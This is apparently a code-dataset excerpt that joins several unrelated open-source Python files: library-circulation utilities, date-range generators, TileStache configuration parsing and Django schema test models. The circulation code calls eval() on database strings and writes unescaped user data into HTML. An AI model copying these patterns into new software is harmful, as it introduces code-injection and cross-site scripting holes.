@type date_string: string
@return next day
"""
# add 1 day
more_1_day = datetime.timedelta(days=1)
# convert date_string to datetime format
tmp_date = time.strptime(date_string, '%Y-%m-%d')
# calculate the new date (next day)
next_day = datetime.datetime(*tmp_date[:3]) + more_1_day
return next_day
def generate_new_due_date(days):
"""
Generate a new due date (today + X days = new due date).
@param days: number of days
@type days: int
@return new due date
"""
today = datetime.date.today()
more_X_days = datetime.timedelta(days=days)
tmp_date = today + more_X_days
week_day = tmp_date.strftime('%A')
due_date = tmp_date.strftime('%Y-%m-%d')
due_date_validated = False
while not due_date_validated:
if week_day in CFG_BIBCIRCULATION_WORKING_DAYS and due_date not in CFG_BIBCIRCULATION_HOLIDAYS:
due_date_validated = True
else:
next_day = get_next_day(due_date)
due_date = next_day.strftime('%Y-%m-%d')
week_day = next_day.strftime('%A')
return due_date
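# Worked example (illustrative; the actual result depends on the site's
# CFG_BIBCIRCULATION_WORKING_DAYS and CFG_BIBCIRCULATION_HOLIDAYS settings):
# with Monday-Friday configured as working days and no holidays, a call to
# generate_new_due_date(30) whose raw due date lands on a Saturday keeps
# rolling forward one day at a time and returns the following Monday.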
def renew_loan_for_X_days(barcode):
"""
Renew a loan based on its loan period
@param barcode: identify the item. Primary key of crcITEM.
@type barcode: string
@return new due date
"""
loan_period = db.get_loan_period(barcode)
if loan_period == '4 weeks':
due_date = generate_new_due_date(30)
else:
due_date = generate_new_due_date(7)
return due_date
def make_copy_available(request_id):
"""
Change the status of a copy to 'available' when
a hold request is cancelled.
@param request_id: identify the request: Primary key of crcLOANREQUEST
@type request_id: int
"""
barcode_requested = db.get_requested_barcode(request_id)
db.update_item_status('available', barcode_requested)
return
def print_new_loan_information(req, ln):
"""
Create a printable format with the information of the last
loan that has been registered in the table crcLOAN.
"""
_ = gettext_set_language(ln)
# get the last loan from crcLOAN
(recid, borrower_id, due_date) = db.get_last_loan()
# get book's information
(book_title, book_year, book_author, book_isbn, book_editor) = book_information_from_MARC(recid)
# get borrower's data/information (name, address, email)
(borrower_name, borrower_address, borrower_email) = db.get_borrower_data(borrower_id)
# Generate printable format
req.content_type = "text/html"
req.send_http_header()
out = """<table style='width:95%; margin:auto; max-width: 600px;'>"""
out += """
<tr>
<td><img src="%s/img/CERN_CDS_logo.png"></td>
</tr>
</table><br />""" % (CFG_SITE_URL)
out += """<table style='color: #79d; font-size: 82%; width:95%; margin:auto; max-width: 400px;'>"""
out += """ <tr><td align="center"><h2><strong>%s</strong></h2></td></tr>""" % (_("Loan information"))
out += """ <tr><td align="center"><strong>%s</strong></td></tr>""" % (_("This book is sent to you ..."))
out += """</table><br />"""
out += """<table style='color: #79d; font-size: 82%; width:95%; margin:auto; max-width: 400px;'>"""
out += """<tr>
<td width="70"><strong>%s</strong></td><td style='color: black;'>%s</td>
</tr>
<tr>
<td width="70"><strong>%s</strong></td><td style='color: black;'>%s</td>
</tr>
<tr>
<td width="70"><strong>%s</strong></td><td style='color: black;'>%s</td>
</tr>
<tr>
<td width="70"><strong>%s</strong></td><td style='color: black;'>%s</td>
</tr>
<tr>
<td width="70"><strong>%s</strong></td><td style='color: black;'>%s</td>
</tr>
""" % (_("Title"), book_title,
_("Author"), book_author,
_("Editor"), book_editor,
_("ISBN"), book_isbn,
_("Year"), book_year)
out += """</table><br />"""
out += """<table style='color: #79d; font-size: 82%; width:95%; margin:auto; max-width: 400px;'>"""
out += """<tr>
<td width="70"><strong>%s</strong></td><td style='color: black;'>%s</td>
</tr>
<tr>
<td width="70"><strong>%s</strong></td><td style='color: black;'>%s</td>
</tr>
<tr>
<td width="70"><strong>%s</strong></td><td style='color: black;'>%s</td>
</tr>
<tr>
<td width="70"><strong>%s</strong></td><td style='color: black;'>%s</td>
</tr> """ % (_("Id"), borrower_id,
_("Name"), borrower_name,
_("Address"), borrower_address,
_("Email"), borrower_email)
out += """</table> <br />"""
out += """<table style='color: #79d; font-size: 82%; width:95%; margin:auto; max-width: 400px;'>"""
out += """ <tr><td align="center"><h2><strong>%s: %s</strong></h2></td></tr>""" % (_("Due date"), due_date)
out += """</table>"""
out += """<table style='color: #79d; font-size: 82%; width:95%; margin:auto; max-width: 800px;'>
<tr><td><input type="button" onClick='window.print()'
value='Print' style='color: #fff; background: #36c; font-weight: bold;'></td></tr>
</table>"""
req.write("<html>")
req.write(out)
req.write("</html>")
return "\n"
def print_pending_hold_requests_information(req, ln):
"""
Create a printable format with all the information about all
pending hold requests.
"""
_ = gettext_set_language(ln)
requests = db.get_pdf_request_data('pending')
req.content_type = "text/html"
req.send_http_header()
out = """<table style='width:100%; margin:auto; max-width: 1024px;'>"""
out += """
<tr>
<td><img src="%s/img/CERN_CDS_logo.png"></td>
</tr>
</table><br />""" % (CFG_SITE_URL)
out += """<table style='color: #79d; font-size: 82%; width:95%; margin:auto; max-width: 1024px;'>"""
out += """ <tr><td align="center"><h2><strong>%s</strong></h2></td></tr>""" % (_("List of pending hold requests"))
out += """ <tr><td align="center"><strong>%s</strong></td></tr>""" % (time.ctime())
out += """</table><br/>"""
out += """<table style='color: #79d; font-size: 82%; width:95%; margin:auto; max-width: 1024px;'>"""
out += """<tr>
<td><strong>%s</strong></td>
<td><strong>%s</strong></td>
<td><strong>%s</strong></td>
<td><strong>%s</strong></td>
<td><strong>%s</strong></td>
<td><strong>%s</strong></td>
<td><strong>%s</strong></td>
</tr>
""" % (_("Borrower"),
_("Item"),
_("Library"),
_("Location"),
_("From"),
_("To"),
_("Request date"))
for (recid, borrower_name, library_name, location, date_from, date_to, request_date) in requests:
out += """<tr style='color: black;'>
<td class="bibcirccontent">%s</td>
<td class="bibcirccontent">%s</td>
<td class="bibcirccontent">%s</td>
<td class="bibcirccontent">%s</td>
<td class="bibcirccontent">%s</td>
<td class="bibcirccontent">%s</td>
<td class="bibcirccontent">%s</td>
</tr>
""" % (borrower_name, book_title_from_MARC(recid), library_name,
location, date_from, date_to, request_date)
out += """</table>
<br />
<br />
<table style='color: #79d; font-size: 82%; width:95%; margin:auto; max-width: 1024px;'>
<tr>
<td>
<input type=button value='Back' onClick="history.go(-1)"
style='color: #fff; background: #36c; font-weight: bold;'>
<input type="button" onClick='window.print()'
value='Print' style='color: #fff; background: #36c; font-weight: bold;'>
</td>
</tr>
</table>"""
req.write("<html>")
req.write(out)
req.write("</html>")
return "\n"
def get_item_info_for_search_result(recid):
"""
Get the item's info from MARC in order to create a
search result with more details
@param recid: identify the record. Primary key of bibrec.
@type recid: int
@return book's information (author, editor and number of copies)
"""
book_author = ' '.join(get_fieldvalues(recid, "100__a") + \
get_fieldvalues(recid, "100__u"))
book_editor = ' , '.join(get_fieldvalues(recid, "260__a") + \
get_fieldvalues(recid, "260__b") + \
get_fieldvalues(recid, "260__c"))
book_copies = ' '.join(get_fieldvalues(recid, "964__a"))
book_infos = (book_author, book_editor, book_copies)
return book_infos
def update_request_data(request_id):
"""
Update the status of a given request.
@param request_id: identify the request: Primary key of crcLOANREQUEST
@type request_id: int
"""
barcode = db.get_request_barcode(request_id)
nb_requests = db.get_number_requests_per_copy(barcode)
is_on_loan = db.is_item_on_loan(barcode)
if nb_requests == 0 and is_on_loan is not None:
db.update_item_status('on loan', barcode)
elif nb_requests == 0 and is_on_loan is None:
db.update_item_status('available', barcode)
else:
db.update_item_status('requested', barcode)
return
def compare_dates(date):
"""
Compare given date with today
@param date: given date
@type date: string
@return boolean
"""
if date < time.strftime("%Y-%m-%d"):
return False
else:
return True
def validate_date_format(date):
"""
Verify the date format
@param date: given date
@type date: string
@return boolean
"""
try:
if time.strptime(date, "%Y-%m-%d"):
if compare_dates(date):
return True
else:
return False
except ValueError:
return False
def create_ill_record(book_info):
"""
Create a new ILL record
@param book_info: book's information
@type book_info: tuple
@return MARC record
"""
(title, author, place, publisher, year, edition, isbn) = book_info
ill_record = """
<record>
<datafield tag="020" ind1=" " ind2=" ">
<subfield code="a">%(isbn)s</subfield>
</datafield>
<datafield tag="100" ind1=" " ind2=" ">
<subfield code="a">%(author)s</subfield>
</datafield>
<datafield tag="245" ind1=" " ind2=" ">
<subfield code="a">%(title)s</subfield>
</datafield>
<datafield tag="250" ind1=" " ind2=" ">
<subfield code="a">%(edition)s</subfield>
</datafield>
<datafield tag="260" ind1=" " ind2=" ">
<subfield code="a">%(place)s</subfield>
<subfield code="b">%(publisher)s</subfield>
<subfield code="c">%(year)s</subfield>
</datafield>
<datafield tag="980" ind1=" " ind2=" ">
<subfield code="a">ILLBOOK</subfield>
</datafield>
</record>
""" % {'isbn': isbn,
'author': author,
'title': title,
'edition': edition,
'place': place,
'publisher': publisher,
'year': year}
file_path = '%s/%s_%s.xml' % (CFG_TMPDIR, 'bibcirculation_ill_book',
time.strftime("%Y%m%d_%H%M%S"))
xml_file = open(file_path, 'w')
xml_file.write(ill_record)
xml_file.close()
# Pass XML file to BibUpload.
task_low_level_submission('bibupload', 'bibcirculation', '-P', '5', '-i',
file_path)
return ill_record
def wash_recid_from_ILL_request(ill_request_id):
"""
Get dictionary and wash recid values.
@param ill_request_id: identify the ILL request. Primray key of crcILLREQUEST
@type ill_request_id: int
@return recid
"""
book_info = db.get_ill_book_info(ill_request_id)
if looks_like_dictionary(book_info):
book_info = eval(book_info)
else:
book_info = None
try:
recid = int(book_info['recid'])
except (KeyError, TypeError):  # book_info may be None or lack 'recid'
recid = None
return recid
def get_list_of_ILL_requests():
"""
Get a list of all recids related to ILL requests
"""
list_of_recids = []
ill_requests = db.get_ill_ids()
for i in range(len(ill_requests)):
recid = wash_recid_from_ILL_request(ill_requests[i][0])
if recid:
list_of_recids.append(recid)
return list_of_recids
def all_copies_are_missing(recid):
"""
Verify if all copies of an item are missing
@param recid: identify the record. Primary key of bibrec
@type recid: int
@return boolean
"""
copies_status = db.get_copies_status(recid)
number_of_missing = 0
for (status) in copies_status:
if status == 'missing':
number_of_missing += 1
if number_of_missing == len(copies_status):
return True
else:
return False
def has_copies(recid):
"""
Verify if a recid is item (has copies)
@param recid: identify the record. Primary key of bibrec
@type recid: int
@return boolean
"""
copies_status = db.get_copies_status(recid)
if copies_status is None:
return False
else:
if len(copies_status) == 0:
return False
else:
return True
def generate_email_body(template, loan_id):
"""
Generate the body of an email for loan recalls.
@param template: email template
@type template: string
@param loan_id: identify the loan. Primary key of crcLOAN.
@type loan_id: int
@return email(body)
"""
recid = db.get_loan_recid(loan_id)
(book_title, book_year, book_author,
book_isbn, book_editor) = book_information_from_MARC(int(recid))
out = template % (book_title, book_year, book_author,
book_isbn, book_editor)
return out
def create_item_details_url(recid, ln):
"""
Generate the URL redirecting to the edition of record copies
@param recid: The identifier of the record
@type recid: int
@param ln: The language identifier
@type ln: string
@return A string being the URL allowing to edit currently viewed record
"""
url = '/admin/bibcirculation/bibcirculationadmin.py/get_item_details?ln=%s&recid=%s' % (ln, str(recid))
return CFG_SITE_URL + url
def looks_like_dictionary(candidate_string):
if re.match(DICC_REGEXP, candidate_string):
return True
else:
return False
| gpl-2.0 | -8,326,159,641,433,594,000 | 29.505698 | 118 | 0.543638 | false |
HiSPARC/publicdb | publicdb/raw_data/date_generator.py | 1 | 1373 | import datetime
def daterange(start, stop):
"""Generator for date ranges
This is a generator for date ranges. Based on a start and stop value,
it generates one day intervals.
:param start: a date instance, start of range
:param stop: a date instance, end of range
:yield date: dates with one day interval between start and stop
"""
if start == stop:
yield start
return
else:
yield start
cur = start
while cur < stop:
cur += datetime.timedelta(days=1)
yield cur
return
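# Example (illustrative): both endpoints are included, one day apart.
#
#   >>> import datetime
#   >>> list(daterange(datetime.date(2017, 1, 30), datetime.date(2017, 2, 2)))
#   [datetime.date(2017, 1, 30), datetime.date(2017, 1, 31),
#    datetime.date(2017, 2, 1), datetime.date(2017, 2, 2)]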
def single_day_ranges(start, end):
"""Generate datetime ranges consisting of a single day.
Generate datetime ranges, a single day at a time. The generator keeps
returning two datetime values, making up a range of a full day.
However, the first and last days may be shorter, if a specific
time-of-day was specified.
:param start: a datetime instance, start of range
:param end: a datetime instance, end of range
:yield cur,next: date intervals between start and stop
"""
cur = start
next_day = (cur.replace(hour=0, minute=0, second=0, microsecond=0) +
datetime.timedelta(days=1))
while next_day < end:
yield cur, next_day
cur = next_day
next_day = cur + datetime.timedelta(days=1)
yield cur, end
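# Example (illustrative): the first and last ranges are clipped to the given
# times of day, the middle one spans a full day.
#
#   >>> start = datetime.datetime(2017, 1, 30, 12, 0)
#   >>> end = datetime.datetime(2017, 2, 1, 6, 0)
#   >>> list(single_day_ranges(start, end))
#   [(datetime.datetime(2017, 1, 30, 12, 0), datetime.datetime(2017, 1, 31, 0, 0)),
#    (datetime.datetime(2017, 1, 31, 0, 0), datetime.datetime(2017, 2, 1, 0, 0)),
#    (datetime.datetime(2017, 2, 1, 0, 0), datetime.datetime(2017, 2, 1, 6, 0))]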
| gpl-3.0 | -3,784,288,338,580,211,700 | 27.604167 | 74 | 0.639476 | false |
TileStache/TileStache | TileStache/Config.py | 1 | 15616 | """ The configuration bits of TileStache.
TileStache configuration is stored in JSON files, and is composed of two main
top-level sections: "cache" and "layers". There are examples of both in this
minimal sample configuration:
{
"cache": {"name": "Test"},
"layers": {
"example": {
"provider": {"name": "mapnik", "mapfile": "examples/style.xml"},,
"projection": "spherical mercator"
}
}
}
The contents of the "cache" section are described in greater detail in the
TileStache.Caches module documentation. Here is a different sample:
"cache": {
"name": "Disk",
"path": "/tmp/stache",
"umask": "0000"
}
The "layers" section is a dictionary of layer names which are specified in the
URL of an individual tile. More detail on the configuration of individual layers
can be found in the TileStache.Core module documentation. Another sample:
{
"cache": ...,
"layers":
{
"example-name":
{
"provider": { ... },
"metatile": { ... },
"preview": { ... },
"stale lock timeout": ...,
"projection": ...
}
}
}
Configuration also supports these additional settings:
- "logging": one of "debug", "info", "warning", "error" or "critical", as
described in Python's logging module: http://docs.python.org/howto/logging.html
- "index": configurable index pages for the front page of an instance.
A custom index can be specified as a filename relative to the configuration
location. Typically an HTML document would be given here, but other kinds of
files such as images can be used, with MIME content-type headers determined
by mimetypes.guess_type. A simple text greeting is displayed if no index
is provided.
In-depth explanations of the layer components can be found in the module
documentation for TileStache.Providers, TileStache.Core, and TileStache.Geography.
"""
import sys
import logging
from os.path import join as pathjoin
from mimetypes import guess_type
from json import dumps
try:
from json import dumps as json_dumps
except ImportError:
from simplejson import dumps as json_dumps
from ModestMaps.Geo import Location
from ModestMaps.Core import Coordinate
from . import Core
from . import Caches
from . import Providers
from . import Geography
from . import PixelEffects
from .py3_compat import reduce, urljoin, urlparse, urlopen
class Configuration:
""" A complete site configuration, with a collection of Layer objects.
Attributes:
cache:
Cache instance, e.g. TileStache.Caches.Disk etc.
See TileStache.Caches for details on what makes
a usable cache.
layers:
Dictionary of layers keyed by name.
When creating a custom layers dictionary, e.g. for dynamic
layer collections backed by some external configuration,
these dictionary methods must be provided for a complete
collection of layers:
keys():
Return list of layer name strings.
items():
Return list of (name, layer) pairs.
__contains__(key):
Return boolean true if given key is an existing layer.
__getitem__(key):
Return existing layer object for given key or raise KeyError.
dirpath:
Local filesystem path for this configuration,
useful for expanding relative paths.
Optional attribute:
index:
Mimetype, content tuple for default index response.
"""
def __init__(self, cache, dirpath):
self.cache = cache
self.dirpath = dirpath
self.layers = {}
self.index = 'text/plain', 'TileStache bellows hello.'
class Bounds:
""" Coordinate bounding box for tiles.
"""
def __init__(self, upper_left_high, lower_right_low):
""" Two required Coordinate objects defining tile pyramid bounds.
Boundaries are inclusive: upper_left_high is the left-most column,
upper-most row, and highest zoom level; lower_right_low is the
right-most column, furthest-down row, and lowest zoom level.
"""
self.upper_left_high = upper_left_high
self.lower_right_low = lower_right_low
def excludes(self, tile):
""" Check a tile Coordinate against the bounds, return true/false.
"""
if tile.zoom > self.upper_left_high.zoom:
# too zoomed-in
return True
if tile.zoom < self.lower_right_low.zoom:
# too zoomed-out
return True
# check the top-left tile corner against the lower-right bound
_tile = tile.zoomTo(self.lower_right_low.zoom)
if _tile.column > self.lower_right_low.column:
# too far right
return True
if _tile.row > self.lower_right_low.row:
# too far down
return True
# check the bottom-right tile corner against the upper-left bound
__tile = tile.right().down().zoomTo(self.upper_left_high.zoom)
if __tile.column < self.upper_left_high.column:
# too far left
return True
if __tile.row < self.upper_left_high.row:
# too far up
return True
return False
def __str__(self):
return 'Bound %s - %s' % (self.upper_left_high, self.lower_right_low)
class BoundsList:
""" Multiple coordinate bounding boxes for tiles.
"""
def __init__(self, bounds):
""" Single argument is a list of Bounds objects.
"""
self.bounds = bounds
def excludes(self, tile):
""" Check a tile Coordinate against the bounds, return false if none match.
"""
for bound in self.bounds:
if not bound.excludes(tile):
return False
# Nothing worked.
return True
def buildConfiguration(config_dict, dirpath='.'):
""" Build a configuration dictionary into a Configuration object.
The second argument is an optional dirpath that specifies where in the
local filesystem the parsed dictionary originated, to make it possible
to resolve relative paths. It might be a path or more likely a full
URL including the "file://" prefix.
"""
scheme, h, path, p, q, f = urlparse(dirpath)
if scheme in ('', 'file'):
sys.path.insert(0, path)
cache_dict = config_dict.get('cache', {})
cache = _parseConfigCache(cache_dict, dirpath)
config = Configuration(cache, dirpath)
for (name, layer_dict) in config_dict.get('layers', {}).items():
config.layers[name] = _parseConfigLayer(layer_dict, config, dirpath)
if 'index' in config_dict:
index_href = urljoin(dirpath, config_dict['index'])
index_body = urlopen(index_href).read()
index_type = guess_type(index_href)
config.index = index_type[0], index_body
if 'logging' in config_dict:
level = config_dict['logging'].upper()
if hasattr(logging, level):
logging.basicConfig(level=getattr(logging, level))
return config
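# Usage sketch (illustrative only; the mapfile and dirpath are made up):
#
#   config = buildConfiguration({
#       "cache": {"name": "Test"},
#       "layers": {
#           "example": {
#               "provider": {"name": "mapnik", "mapfile": "style.xml"},
#               "projection": "spherical mercator"
#           }
#       }
#   }, dirpath='file:///etc/tilestache/')
#   # config.cache is a Caches.Test instance and config.layers['example']
#   # a Core.Layer wired to the Mapnik provider.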
def enforcedLocalPath(relpath, dirpath, context='Path'):
""" Return a forced local path, relative to a directory.
Throw an error if the combination of path and directory seems to
specify a remote path, e.g. "/path" and "http://example.com".
Although a configuration file can be parsed from a remote URL, some
paths (e.g. the location of a disk cache) must be local to the server.
In cases where we mix a remote configuration location with a local
cache location, e.g. "http://example.com/tilestache.cfg", the disk path
must include the "file://" prefix instead of an ambiguous absolute
path such as "/tmp/tilestache".
"""
parsed_dir = urlparse(dirpath)
parsed_rel = urlparse(relpath)
if parsed_rel.scheme not in ('file', ''):
raise Core.KnownUnknown('%s path must be a local file path, absolute or "file://", not "%s".' % (context, relpath))
if parsed_dir.scheme not in ('file', '') and parsed_rel.scheme != 'file':
raise Core.KnownUnknown('%s path must start with "file://" in a remote configuration ("%s" relative to %s)' % (context, relpath, dirpath))
if parsed_rel.scheme == 'file':
# file:// is an absolute local reference for the disk cache.
return parsed_rel.path
if parsed_dir.scheme == 'file':
# file:// is an absolute local reference for the directory.
return urljoin(parsed_dir.path, parsed_rel.path)
# nothing has a scheme, it's probably just a bunch of
# dumb local paths, so let's see what happens next.
return pathjoin(dirpath, relpath)
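# Behaviour sketch (illustrative):
#
#   enforcedLocalPath('cache', '/etc/tilestache')
#   # -> '/etc/tilestache/cache'
#   enforcedLocalPath('file:///tmp/stache', 'http://example.com/tilestache.cfg')
#   # -> '/tmp/stache'
#   enforcedLocalPath('/tmp/stache', 'http://example.com/tilestache.cfg')
#   # -> raises Core.KnownUnknown (ambiguous local path for a remote config)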
def _parseConfigCache(cache_dict, dirpath):
""" Used by parseConfig() to parse just the cache parts of a config.
"""
if 'name' in cache_dict:
_class = Caches.getCacheByName(cache_dict['name'])
kwargs = {}
def add_kwargs(*keys):
""" Populate named keys in kwargs from cache_dict.
"""
for key in keys:
if key in cache_dict:
kwargs[key] = cache_dict[key]
if _class is Caches.Test:
if cache_dict.get('verbose', False):
kwargs['logfunc'] = lambda msg: sys.stderr.write(msg + '\n')
elif _class is Caches.Disk:
kwargs['path'] = enforcedLocalPath(cache_dict['path'], dirpath, 'Disk cache path')
if 'umask' in cache_dict:
kwargs['umask'] = int(cache_dict['umask'], 8)
add_kwargs('dirs', 'gzip')
elif _class is Caches.Multi:
kwargs['tiers'] = [_parseConfigCache(tier_dict, dirpath)
for tier_dict in cache_dict['tiers']]
elif _class is Caches.Memcache.Cache:
if 'key prefix' in cache_dict:
kwargs['key_prefix'] = cache_dict['key prefix']
add_kwargs('servers', 'lifespan', 'revision')
elif _class is Caches.Redis.Cache:
if 'key prefix' in cache_dict:
kwargs['key_prefix'] = cache_dict['key prefix']
add_kwargs('host', 'port', 'db')
elif _class is Caches.S3.Cache:
add_kwargs('bucket', 'access', 'secret', 'use_locks', 'path', 'reduced_redundancy', 'policy')
else:
raise Exception('Unknown cache: %s' % cache_dict['name'])
elif 'class' in cache_dict:
_class = Core.loadClassPath(cache_dict['class'])
kwargs = cache_dict.get('kwargs', {})
kwargs = dict( [(str(k), v) for (k, v) in kwargs.items()] )
else:
raise Exception('Missing required cache name or class: %s' % json_dumps(cache_dict))
cache = _class(**kwargs)
return cache
def _parseLayerBounds(bounds_dict, projection):
"""
"""
north, west = bounds_dict.get('north', 89), bounds_dict.get('west', -180)
south, east = bounds_dict.get('south', -89), bounds_dict.get('east', 180)
high, low = bounds_dict.get('high', 31), bounds_dict.get('low', 0)
try:
ul_hi = projection.locationCoordinate(Location(north, west)).zoomTo(high)
lr_lo = projection.locationCoordinate(Location(south, east)).zoomTo(low)
except TypeError:
raise Core.KnownUnknown('Bad bounds for layer, need north, south, east, west, high, and low: ' + dumps(bounds_dict))
return Bounds(ul_hi, lr_lo)
def _parseConfigLayer(layer_dict, config, dirpath):
""" Used by parseConfig() to parse just the layer parts of a config.
"""
projection = layer_dict.get('projection', 'spherical mercator')
projection = Geography.getProjectionByName(projection)
#
# Add cache lock timeouts and preview arguments
#
layer_kwargs = {}
if 'cache lifespan' in layer_dict:
layer_kwargs['cache_lifespan'] = int(layer_dict['cache lifespan'])
if 'stale lock timeout' in layer_dict:
layer_kwargs['stale_lock_timeout'] = int(layer_dict['stale lock timeout'])
if 'write cache' in layer_dict:
layer_kwargs['write_cache'] = bool(layer_dict['write cache'])
if 'allowed origin' in layer_dict:
layer_kwargs['allowed_origin'] = str(layer_dict['allowed origin'])
if 'maximum cache age' in layer_dict:
layer_kwargs['max_cache_age'] = int(layer_dict['maximum cache age'])
if 'redirects' in layer_dict:
layer_kwargs['redirects'] = dict(layer_dict['redirects'])
if 'tile height' in layer_dict:
layer_kwargs['tile_height'] = int(layer_dict['tile height'])
if 'preview' in layer_dict:
preview_dict = layer_dict['preview']
for (key, func) in zip(('lat', 'lon', 'zoom', 'ext'), (float, float, int, str)):
if key in preview_dict:
layer_kwargs['preview_' + key] = func(preview_dict[key])
#
# Do the bounds
#
if 'bounds' in layer_dict:
if type(layer_dict['bounds']) is dict:
layer_kwargs['bounds'] = _parseLayerBounds(layer_dict['bounds'], projection)
elif type(layer_dict['bounds']) is list:
bounds = [_parseLayerBounds(b, projection) for b in layer_dict['bounds']]
layer_kwargs['bounds'] = BoundsList(bounds)
else:
raise Core.KnownUnknown('Layer bounds must be a dictionary, not: ' + dumps(layer_dict['bounds']))
#
# Do the metatile
#
meta_dict = layer_dict.get('metatile', {})
metatile_kwargs = {}
for k in ('buffer', 'rows', 'columns'):
if k in meta_dict:
metatile_kwargs[k] = int(meta_dict[k])
metatile = Core.Metatile(**metatile_kwargs)
#
# Do the per-format options
#
jpeg_kwargs = {}
png_kwargs = {}
if 'jpeg options' in layer_dict:
jpeg_kwargs = dict([(str(k), v) for (k, v) in layer_dict['jpeg options'].items()])
if 'png options' in layer_dict:
png_kwargs = dict([(str(k), v) for (k, v) in layer_dict['png options'].items()])
#
# Do pixel effect
#
pixel_effect = None
if 'pixel effect' in layer_dict:
pixel_effect_dict = layer_dict['pixel effect']
pixel_effect_name = pixel_effect_dict.get('name')
if pixel_effect_name in PixelEffects.all:
pixel_effect_kwargs = {}
for k, v in pixel_effect_dict.items():
if k != 'name':
pixel_effect_kwargs[str(k)] = float(v)
PixelEffectClass = PixelEffects.all[pixel_effect_name]
pixel_effect = PixelEffectClass(**pixel_effect_kwargs)
#
# Do the provider
#
provider_dict = layer_dict['provider']
if 'name' in provider_dict:
_class = Providers.getProviderByName(provider_dict['name'])
provider_kwargs = _class.prepareKeywordArgs(provider_dict)
elif 'class' in provider_dict:
_class = Core.loadClassPath(provider_dict['class'])
provider_kwargs = provider_dict.get('kwargs', {})
provider_kwargs = dict( [(str(k), v) for (k, v) in provider_kwargs.items()] )
else:
raise Exception('Missing required provider name or class: %s' % json_dumps(provider_dict))
#
# Finish him!
#
layer = Core.Layer(config, projection, metatile, **layer_kwargs)
layer.provider = _class(layer, **provider_kwargs)
layer.setSaveOptionsJPEG(**jpeg_kwargs)
layer.setSaveOptionsPNG(**png_kwargs)
layer.pixel_effect = pixel_effect
return layer
| bsd-3-clause | -1,455,473,924,395,118,800 | 32.367521 | 146 | 0.613473 | false |
labcodes/django | tests/schema/models.py | 1 | 4719 | from django.apps.registry import Apps
from django.db import models
# Because we want to test creation and deletion of these as separate things,
# these models are all inserted into a separate Apps so the main test
# runner doesn't migrate them.
new_apps = Apps()
class Author(models.Model):
name = models.CharField(max_length=255)
height = models.PositiveIntegerField(null=True, blank=True)
weight = models.IntegerField(null=True, blank=True)
class Meta:
apps = new_apps
class AuthorTextFieldWithIndex(models.Model):
text_field = models.TextField(db_index=True)
class Meta:
apps = new_apps
class AuthorWithDefaultHeight(models.Model):
name = models.CharField(max_length=255)
height = models.PositiveIntegerField(null=True, blank=True, default=42)
class Meta:
apps = new_apps
class AuthorWithEvenLongerName(models.Model):
name = models.CharField(max_length=255)
height = models.PositiveIntegerField(null=True, blank=True)
class Meta:
apps = new_apps
class AuthorWithIndexedName(models.Model):
name = models.CharField(max_length=255, db_index=True)
class Meta:
apps = new_apps
class Book(models.Model):
author = models.ForeignKey(Author, models.CASCADE)
title = models.CharField(max_length=100, db_index=True)
pub_date = models.DateTimeField()
# tags = models.ManyToManyField("Tag", related_name="books")
class Meta:
apps = new_apps
class BookWeak(models.Model):
author = models.ForeignKey(Author, models.CASCADE, db_constraint=False)
title = models.CharField(max_length=100, db_index=True)
pub_date = models.DateTimeField()
class Meta:
apps = new_apps
class BookWithLongName(models.Model):
author_foreign_key_with_really_long_field_name = models.ForeignKey(
AuthorWithEvenLongerName,
models.CASCADE,
)
class Meta:
apps = new_apps
class BookWithO2O(models.Model):
author = models.OneToOneField(Author, models.CASCADE)
title = models.CharField(max_length=100, db_index=True)
pub_date = models.DateTimeField()
class Meta:
apps = new_apps
db_table = "schema_book"
class BookWithSlug(models.Model):
author = models.ForeignKey(Author, models.CASCADE)
title = models.CharField(max_length=100, db_index=True)
pub_date = models.DateTimeField()
slug = models.CharField(max_length=20, unique=True)
class Meta:
apps = new_apps
db_table = "schema_book"
class BookWithoutAuthor(models.Model):
title = models.CharField(max_length=100, db_index=True)
pub_date = models.DateTimeField()
class Meta:
apps = new_apps
db_table = "schema_book"
class BookForeignObj(models.Model):
title = models.CharField(max_length=100, db_index=True)
author_id = models.IntegerField()
class Meta:
apps = new_apps
class IntegerPK(models.Model):
i = models.IntegerField(primary_key=True)
j = models.IntegerField(unique=True)
class Meta:
apps = new_apps
db_table = "INTEGERPK" # uppercase to ensure proper quoting
class Note(models.Model):
info = models.TextField()
class Meta:
apps = new_apps
class NoteRename(models.Model):
detail_info = models.TextField()
class Meta:
apps = new_apps
db_table = "schema_note"
class Tag(models.Model):
title = models.CharField(max_length=255)
slug = models.SlugField(unique=True)
class Meta:
apps = new_apps
class TagIndexed(models.Model):
title = models.CharField(max_length=255)
slug = models.SlugField(unique=True)
class Meta:
apps = new_apps
index_together = [["slug", "title"]]
class TagM2MTest(models.Model):
title = models.CharField(max_length=255)
slug = models.SlugField(unique=True)
class Meta:
apps = new_apps
class TagUniqueRename(models.Model):
title = models.CharField(max_length=255)
slug2 = models.SlugField(unique=True)
class Meta:
apps = new_apps
db_table = "schema_tag"
# Based on tests/reserved_names/models.py
class Thing(models.Model):
when = models.CharField(max_length=1, primary_key=True)
class Meta:
db_table = 'drop'
def __str__(self):
return self.when
class UniqueTest(models.Model):
year = models.IntegerField()
slug = models.SlugField(unique=False)
class Meta:
apps = new_apps
unique_together = ["year", "slug"]
class Node(models.Model):
node_id = models.AutoField(primary_key=True)
parent = models.ForeignKey('self', models.CASCADE, null=True, blank=True)
class Meta:
apps = new_apps
| bsd-3-clause | 8,553,160,393,117,914,000 | 22.595 | 77 | 0.671117 | false |
ddurieux/alignak | alignak/misc/termcolor.py | 1 | 5121 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# coding: utf-8
# Copyright (c) 2008-2011 Volvox Development Team
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
